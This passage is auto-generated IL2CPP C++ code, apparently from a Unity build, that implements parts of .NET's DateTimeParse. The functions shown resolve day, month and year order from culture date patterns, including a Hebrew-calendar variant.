DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_2, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_001d: { DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_3 = ___raw2; int32_t L_4 = DateTimeRawInfo_GetNumber_mDBE60CA39776210991124099CF150BCF4FA6EE3D((DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_3, 0, /*hidden argument*/NULL); V_0 = L_4; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_5 = ___raw2; int32_t L_6 = DateTimeRawInfo_GetNumber_mDBE60CA39776210991124099CF150BCF4FA6EE3D((DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_5, 1, /*hidden argument*/NULL); V_1 = L_6; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_7 = ___result0; int32_t* L_8 = ___styles1; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); DateTimeParse_GetDefaultYear_m6AA53857838C682DF0D947E1E22502A2888FAC83((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_7, (int32_t*)L_8, /*hidden argument*/NULL); DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_9 = ___dtfi3; String_t* L_10 = DateTimeFormatInfo_get_MonthDayPattern_mDDF41CCC5BBC4BA915AFAA0F973FCD5B2515B0F3(L_9, /*hidden argument*/NULL); DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_11 = ___dtfi3; bool L_12 = DateTimeParse_GetMonthDayOrder_mBB4BC48898E898A22EB1F203AEE286ED77CE9583(L_10, L_11, (int32_t*)(&V_2), /*hidden argument*/NULL); if (L_12) { goto IL_0058; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_13 = ___result0; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_14 = ___dtfi3; String_t* L_15 = DateTimeFormatInfo_get_MonthDayPattern_mDDF41CCC5BBC4BA915AFAA0F973FCD5B2515B0F3(L_14, /*hidden argument*/NULL); DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_13, 3, _stringLiteralFB2D933A5A8BE5989BECD2E8F00EC57F9D995758, L_15, /*hidden argument*/NULL); return (bool)0; } IL_0058: { int32_t L_16 = V_2; if ((!(((uint32_t)L_16) == ((uint32_t)6)))) { goto IL_007d; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_17 = ___result0; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_18 = ___result0; int32_t L_19 = L_18->get_Year_0(); int32_t L_20 = V_0; int32_t L_21 = V_1; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_22 = DateTimeParse_SetDateYMD_m25421E7E3C852432DA2AF85B9B87CC12522C7ECE((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_17, L_19, L_20, L_21, /*hidden argument*/NULL); if (!L_22) { goto IL_009e; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_23 = ___result0; int32_t* L_24 = L_23->get_address_of_flags_8(); int32_t* L_25 = L_24; int32_t L_26 = *((int32_t*)L_25); *((int32_t*)L_25) = (int32_t)((int32_t)((int32_t)L_26|(int32_t)((int32_t)128))); return (bool)1; } IL_007d: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_27 = ___result0; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_28 = ___result0; int32_t L_29 = L_28->get_Year_0(); int32_t L_30 = V_1; int32_t L_31 = V_0; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_32 = DateTimeParse_SetDateYMD_m25421E7E3C852432DA2AF85B9B87CC12522C7ECE((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_27, L_29, L_30, L_31, /*hidden argument*/NULL); if (!L_32) { goto IL_009e; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_33 = ___result0; int32_t* L_34 = L_33->get_address_of_flags_8(); int32_t* L_35 = L_34; int32_t L_36 = *((int32_t*)L_35); *((int32_t*)L_35) = (int32_t)((int32_t)((int32_t)L_36|(int32_t)((int32_t)128))); return (bool)1; } IL_009e: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_37 = ___result0; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_37, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } } // System.Boolean System.DateTimeParse::GetDayOfNNN(System.DateTimeResult&,System.DateTimeRawInfo&,System.Globalization.DateTimeFormatInfo) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_GetDayOfNNN_m7DC4B139DB3853458A7854D87E5B9527E0E08E56 (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result0, DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * ___raw1, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi2, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTimeParse_GetDayOfNNN_m7DC4B139DB3853458A7854D87E5B9527E0E08E56_MetadataUsageId); s_Il2CppMethodInitialized = true; } int32_t V_0 = 0; int32_t V_1 = 0; int32_t V_2 = 0; int32_t V_3 = 0; int32_t V_4 = 0; { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_0 = ___result0; int32_t L_1 = L_0->get_flags_8(); if (!((int32_t)((int32_t)L_1&(int32_t)((int32_t)128)))) { goto IL_001d; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_2 = ___result0; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_2, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_001d: { DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_3 = ___raw1; int32_t L_4 = DateTimeRawInfo_GetNumber_mDBE60CA39776210991124099CF150BCF4FA6EE3D((DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_3, 0, /*hidden argument*/NULL); V_0 = L_4; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_5 = ___raw1; int32_t L_6 = DateTimeRawInfo_GetNumber_mDBE60CA39776210991124099CF150BCF4FA6EE3D((DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_5, 1, /*hidden argument*/NULL); V_1 = L_6; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_7 = ___raw1; int32_t L_8 = DateTimeRawInfo_GetNumber_mDBE60CA39776210991124099CF150BCF4FA6EE3D((DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_7, 2, /*hidden argument*/NULL); V_2 = L_8; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_9 = ___dtfi2; String_t* L_10 = DateTimeFormatInfo_get_ShortDatePattern_m8CAB8ACB8B5C152FA767345BA59E8FE8C8B9A5FA(L_9, /*hidden argument*/NULL); DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_11 = ___dtfi2; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_12 = DateTimeParse_GetYearMonthDayOrder_mE9CAC6C3BFC905C6A5FDFD5DD7A701935DF43776(L_10, L_11, (int32_t*)(&V_3), /*hidden argument*/NULL); if (L_12) { goto IL_0059; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_13 = ___result0; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_14 = ___dtfi2; String_t* L_15 = DateTimeFormatInfo_get_ShortDatePattern_m8CAB8ACB8B5C152FA767345BA59E8FE8C8B9A5FA(L_14, /*hidden argument*/NULL); DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_13, 3, _stringLiteralFB2D933A5A8BE5989BECD2E8F00EC57F9D995758, L_15, /*hidden argument*/NULL); return (bool)0; } IL_0059: { int32_t L_16 = V_3; if (L_16) { goto IL_008a; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_17 = ___result0; int32_t L_18 = V_0; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_19 = DateTimeParse_TryAdjustYear_mE9AD0E5B4C556961411058595C6E34DA9497C43C((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_17, L_18, (int32_t*)(&V_4), /*hidden argument*/NULL); if (!L_19) { goto IL_010e; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_20 = ___result0; int32_t L_21 = V_4; int32_t L_22 = V_1; int32_t L_23 = V_2; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_24 = DateTimeParse_SetDateYMD_m25421E7E3C852432DA2AF85B9B87CC12522C7ECE((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_20, L_21, L_22, L_23, /*hidden argument*/NULL); if (!L_24) { goto IL_010e; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_25 = ___result0; int32_t* L_26 = L_25->get_address_of_flags_8(); int32_t* L_27 = L_26; int32_t L_28 = *((int32_t*)L_27); *((int32_t*)L_27) = (int32_t)((int32_t)((int32_t)L_28|(int32_t)((int32_t)128))); return (bool)1; } IL_008a: { int32_t L_29 = V_3; if ((!(((uint32_t)L_29) == ((uint32_t)1)))) { goto IL_00b6; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_30 = ___result0; int32_t L_31 = V_2; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_32 = DateTimeParse_TryAdjustYear_mE9AD0E5B4C556961411058595C6E34DA9497C43C((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_30, L_31, (int32_t*)(&V_4), /*hidden argument*/NULL); if (!L_32) { goto IL_010e; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_33 = ___result0; int32_t L_34 = V_0; int32_t L_35 = V_1; int32_t L_36 = V_4; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_37 = DateTimeParse_SetDateMDY_m15C5D980488D64E3A673443F6382D89F4B52DA7E((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_33, L_34, L_35, L_36, /*hidden argument*/NULL); if (!L_37) { goto IL_010e; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_38 = ___result0; int32_t* L_39 = L_38->get_address_of_flags_8(); int32_t* L_40 = L_39; int32_t L_41 = *((int32_t*)L_40); *((int32_t*)L_40) = (int32_t)((int32_t)((int32_t)L_41|(int32_t)((int32_t)128))); return (bool)1; } IL_00b6: { int32_t L_42 = V_3; if ((!(((uint32_t)L_42) == ((uint32_t)2)))) { goto IL_00e2; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_43 = ___result0; int32_t L_44 = V_2; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_45 = DateTimeParse_TryAdjustYear_mE9AD0E5B4C556961411058595C6E34DA9497C43C((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_43, L_44, (int32_t*)(&V_4), /*hidden argument*/NULL); if (!L_45) { goto IL_010e; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_46 = ___result0; int32_t L_47 = V_0; int32_t L_48 = V_1; int32_t L_49 = V_4; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_50 = DateTimeParse_SetDateDMY_m7EF8C6A06954821541C20B6780EAF704329CB324((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_46, L_47, L_48, L_49, /*hidden argument*/NULL); if (!L_50) { goto IL_010e; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_51 = ___result0; int32_t* L_52 = L_51->get_address_of_flags_8(); int32_t* L_53 = L_52; int32_t L_54 = *((int32_t*)L_53); *((int32_t*)L_53) = (int32_t)((int32_t)((int32_t)L_54|(int32_t)((int32_t)128))); return (bool)1; } IL_00e2: { int32_t L_55 = V_3; if ((!(((uint32_t)L_55) == ((uint32_t)3)))) { goto IL_010e; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_56 = ___result0; int32_t L_57 = V_0; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_58 = DateTimeParse_TryAdjustYear_mE9AD0E5B4C556961411058595C6E34DA9497C43C((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_56, L_57, (int32_t*)(&V_4), /*hidden argument*/NULL); if (!L_58) { goto IL_010e; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_59 = ___result0; int32_t L_60 = V_4; int32_t L_61 = V_1; int32_t L_62 = V_2; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_63 = DateTimeParse_SetDateYDM_m06145EDE4B01E360FD3416E70F72CE50746F2CCE((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_59, L_60, L_61, L_62, /*hidden argument*/NULL); if (!L_63) { goto IL_010e; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_64 = ___result0; int32_t* L_65 = L_64->get_address_of_flags_8(); int32_t* L_66 = L_65; int32_t L_67 = *((int32_t*)L_66); *((int32_t*)L_66) = (int32_t)((int32_t)((int32_t)L_67|(int32_t)((int32_t)128))); return (bool)1; } IL_010e: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_68 = ___result0; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_68, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } } // System.Boolean System.DateTimeParse::GetDayOfMN(System.DateTimeResult&,System.Globalization.DateTimeStyles&,System.DateTimeRawInfo&,System.Globalization.DateTimeFormatInfo) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_GetDayOfMN_mA62FE28EDFF83EFD1466C867547B576DC8E68620 (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result0, int32_t* ___styles1, DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * ___raw2, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi3, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTimeParse_GetDayOfMN_mA62FE28EDFF83EFD1466C867547B576DC8E68620_MetadataUsageId); s_Il2CppMethodInitialized = true; } int32_t V_0 = 0; int32_t V_1 = 0; int32_t V_2 = 0; { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_0 = ___result0; int32_t L_1 = L_0->get_flags_8(); if (!((int32_t)((int32_t)L_1&(int32_t)((int32_t)128)))) { goto IL_001d; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_2 = ___result0; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_2, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_001d: { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_3 = ___dtfi3; String_t* L_4 = DateTimeFormatInfo_get_MonthDayPattern_mDDF41CCC5BBC4BA915AFAA0F973FCD5B2515B0F3(L_3, /*hidden argument*/NULL); DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_5 = ___dtfi3; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_6 = DateTimeParse_GetMonthDayOrder_mBB4BC48898E898A22EB1F203AEE286ED77CE9583(L_4, L_5, (int32_t*)(&V_0), /*hidden argument*/NULL); if (L_6) { goto IL_0041; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_7 = ___result0; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_8 = ___dtfi3; String_t* L_9 = DateTimeFormatInfo_get_MonthDayPattern_mDDF41CCC5BBC4BA915AFAA0F973FCD5B2515B0F3(L_8, /*hidden argument*/NULL); DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_7, 3, _stringLiteralFB2D933A5A8BE5989BECD2E8F00EC57F9D995758, L_9, /*hidden argument*/NULL); return (bool)0; } IL_0041: { int32_t L_10 = V_0; if ((!(((uint32_t)L_10) == ((uint32_t)7)))) { goto IL_009f; } } { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_11 = ___dtfi3; String_t* L_12 = DateTimeFormatInfo_get_YearMonthPattern_m58DC71FC083C4CBF5C2856140BEE5EC705AA5034(L_11, /*hidden argument*/NULL); DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_13 = ___dtfi3; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_14 = DateTimeParse_GetYearMonthOrder_mEDFBD53F46F78F077914D6D042E63B05FF79608C(L_12, L_13, (int32_t*)(&V_1), /*hidden argument*/NULL); if (L_14) { goto IL_0069; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_15 = ___result0; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_16 = ___dtfi3; String_t* L_17 = DateTimeFormatInfo_get_YearMonthPattern_m58DC71FC083C4CBF5C2856140BEE5EC705AA5034(L_16, /*hidden argument*/NULL); DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_15, 3, _stringLiteralFB2D933A5A8BE5989BECD2E8F00EC57F9D995758, L_17, /*hidden argument*/NULL); return (bool)0; } IL_0069: { int32_t L_18 = V_1; if ((!(((uint32_t)L_18) == ((uint32_t)5)))) { goto IL_009f; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_19 = ___result0; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_20 = ___raw2; int32_t L_21 = DateTimeRawInfo_GetNumber_mDBE60CA39776210991124099CF150BCF4FA6EE3D((DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_20, 0, /*hidden argument*/NULL); IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_22 = DateTimeParse_TryAdjustYear_mE9AD0E5B4C556961411058595C6E34DA9497C43C((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_19, L_21, (int32_t*)(&V_2), /*hidden argument*/NULL); if (!L_22) { goto IL_008e; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_23 = ___result0; int32_t L_24 = V_2; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_25 = ___raw2; int32_t L_26 = L_25->get_month_2(); IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_27 = DateTimeParse_SetDateYMD_m25421E7E3C852432DA2AF85B9B87CC12522C7ECE((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_23, L_24, L_26, 1, /*hidden argument*/NULL); if (L_27) { goto IL_009d; } } IL_008e: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_28 = ___result0; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_28, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_009d: { return (bool)1; } IL_009f: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_29 = ___result0; int32_t* L_30 = ___styles1; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); DateTimeParse_GetDefaultYear_m6AA53857838C682DF0D947E1E22502A2888FAC83((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_29, (int32_t*)L_30, /*hidden argument*/NULL); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_31 = ___result0; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_32 = ___result0; int32_t L_33 = L_32->get_Year_0(); DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_34 = ___raw2; int32_t L_35 = L_34->get_month_2(); DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_36 = ___raw2; int32_t L_37 = DateTimeRawInfo_GetNumber_mDBE60CA39776210991124099CF150BCF4FA6EE3D((DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_36, 0, /*hidden argument*/NULL); bool L_38 = DateTimeParse_SetDateYMD_m25421E7E3C852432DA2AF85B9B87CC12522C7ECE((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_31, L_33, L_35, L_37, /*hidden argument*/NULL); if (L_38) { goto IL_00d0; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_39 = ___result0; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_39, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_00d0: { return (bool)1; } } // System.Boolean System.DateTimeParse::GetHebrewDayOfNM(System.DateTimeResult&,System.DateTimeRawInfo&,System.Globalization.DateTimeFormatInfo) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_GetHebrewDayOfNM_m4F9314601978E136AD77DBC5D9434C5D360A67FC (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result0, DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * ___raw1, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi2, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTimeParse_GetHebrewDayOfNM_m4F9314601978E136AD77DBC5D9434C5D360A67FC_MetadataUsageId); s_Il2CppMethodInitialized = true; } int32_t V_0 = 0; { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_0 = ___dtfi2; String_t* L_1 = DateTimeFormatInfo_get_MonthDayPattern_mDDF41CCC5BBC4BA915AFAA0F973FCD5B2515B0F3(L_0, /*hidden argument*/NULL); DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_2 = ___dtfi2; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_3 = DateTimeParse_GetMonthDayOrder_mBB4BC48898E898A22EB1F203AEE286ED77CE9583(L_1, L_2, (int32_t*)(&V_0), /*hidden argument*/NULL); if (L_3) { goto IL_0024; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_4 = ___result0; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_5 = ___dtfi2; String_t* L_6 = DateTimeFormatInfo_get_MonthDayPattern_mDDF41CCC5BBC4BA915AFAA0F973FCD5B2515B0F3(L_5, /*hidden argument*/NULL); DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_4, 3, _stringLiteralFB2D933A5A8BE5989BECD2E8F00EC57F9D995758, L_6, /*hidden argument*/NULL); return (bool)0; } IL_0024: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_7 = ___result0; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_8 = ___raw1; int32_t L_9 = L_8->get_month_2(); L_7->set_Month_1(L_9); int32_t L_10 = V_0; if ((((int32_t)L_10) == ((int32_t)7))) { goto IL_0038; } } { int32_t L_11 = V_0; if ((!(((uint32_t)L_11) == ((uint32_t)6)))) { goto IL_006d; } } IL_0038: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_12 = ___result0; Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * L_13 = L_12->get_calendar_10(); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_14 = ___result0; int32_t L_15 = L_14->get_Year_0(); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_16 = ___result0; int32_t L_17 = L_16->get_Month_1(); DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_18 = ___raw1; int32_t L_19 = DateTimeRawInfo_GetNumber_mDBE60CA39776210991124099CF150BCF4FA6EE3D((DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_18, 0, /*hidden argument*/NULL); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_20 = ___result0; int32_t L_21 = L_20->get_era_7(); bool L_22 = VirtFuncInvoker4< bool, int32_t, int32_t, int32_t, int32_t >::Invoke(25 /* System.Boolean System.Globalization.Calendar::IsValidDay(System.Int32,System.Int32,System.Int32,System.Int32) */, L_13, L_15, L_17, L_19, L_21); if (!L_22) { goto IL_006d; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_23 = ___result0; DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_24 = ___raw1; int32_t L_25 = DateTimeRawInfo_GetNumber_mDBE60CA39776210991124099CF150BCF4FA6EE3D((DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_24, 0, /*hidden argument*/NULL); L_23->set_Day_2(L_25); return (bool)1; } IL_006d: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_26 = ___result0; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_26, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } } // System.Boolean System.DateTimeParse::GetDayOfNM(System.DateTimeResult&,System.Globalization.DateTimeStyles&,System.DateTimeRawInfo&,System.Globalization.DateTimeFormatInfo) extern "C" IL2CPP_METHOD_ATTR bool 